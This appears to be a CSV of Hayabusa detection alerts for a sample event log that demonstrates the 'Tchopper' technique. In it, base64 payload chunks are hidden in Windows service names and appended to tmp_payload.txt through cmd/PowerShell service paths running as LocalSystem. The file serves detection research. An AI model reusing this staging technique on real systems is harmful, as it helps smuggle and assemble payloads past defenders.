2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
